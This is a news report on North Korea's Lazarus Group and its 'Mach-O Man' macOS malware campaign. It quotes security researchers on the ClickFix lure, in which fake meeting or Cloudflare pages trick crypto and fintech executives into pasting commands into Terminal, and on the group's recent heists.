North Korea’s state-run Lazarus Group is running a new campaign dubbed “Mach-O Man” that turns routine business communications into a direct route to credential theft and data loss, security experts warned Wednesday.
Natalie Newson, senior blockchain security researcher at CertiK, told CoinDesk on Wednesday that the group has committed an estimated $6.7 billion in cumulative heists since 2017, targeting fintech, cryptocurrency and other high-value executives and companies.
In the past two weeks alone, North Korean hackers have stolen over $500 million via the Drift and KelpDAO vulnerabilities, in what appears to be an ongoing campaign. The crypto industry needs to start looking at Lazarus the way banks look at nation-state cyber actors: “as a persistent and well-funded threat, not just another news headline,” she said.
“What’s especially dangerous about Lazarus right now is their level of activity,” Newsom said. “KelpDAO, Drift, and now the new macOS malware toolkit, all emerged within the same month. This was not a random hack; this was a state-directed financial operation that operated at a scale and speed that is unique to institutions.”
North Korea has turned cryptocurrency theft into a lucrative national industry, and Mach-O Man is just the latest product in that process, she said. Although Lazarus created it, it is also used by other cybercriminal groups.
“This is a modular macOS malware toolkit created by the notorious Chollima division of the Lazarus Group. It uses native Mach-O binaries tailored for the Apple environment where crypto and fintech run,” she said.
Newson said Mach-O Man uses a delivery method called ClickFix. “It’s important to clarify this because a lot of reports confuse two different things,” she noted. ClickFix is a social engineering technique that requires victims to paste commands into their terminal to fix simulated connection issues.
Mauro Eldritch, a security expert and founder of threat intelligence firm BCA Ltd., said Lazarus works by sending “urgent” meeting invitations to executives via Telegram, inviting them to Zoom, Microsoft Teams or Google Meet calls.
The link leads to a fake but convincing website that instructs them to copy and paste a simple command into a Mac Terminal to “fix connection issues.” By doing so, victims gain immediate access to company systems, SaaS platforms, and financial resources. By the time they discover they have been exploited, it is often too late.
Security threat researcher Vladimir S. said on X that there are many variations of this attack. In some cases, Lazarus attackers used the new malware to hijack the domains of decentralized finance (DeFI) projects by replacing their websites with fake messages from Cloudflare asking them to enter commands to grant access.
“These fake ‘verification steps’ lead victims to run harmful commands via keyboard shortcuts,” said Certik’s Newson. “The page looks authentic, the instructions look normal, and the victim initiates the action themselves — which is why traditional security controls often miss it.”
Most victims of this hack will not realize their security has been breached until the damage is done, at which point the malware has deleted itself.
“They probably don’t know it yet,” she said. “If they do, they may not be able to identify which variant affects them.”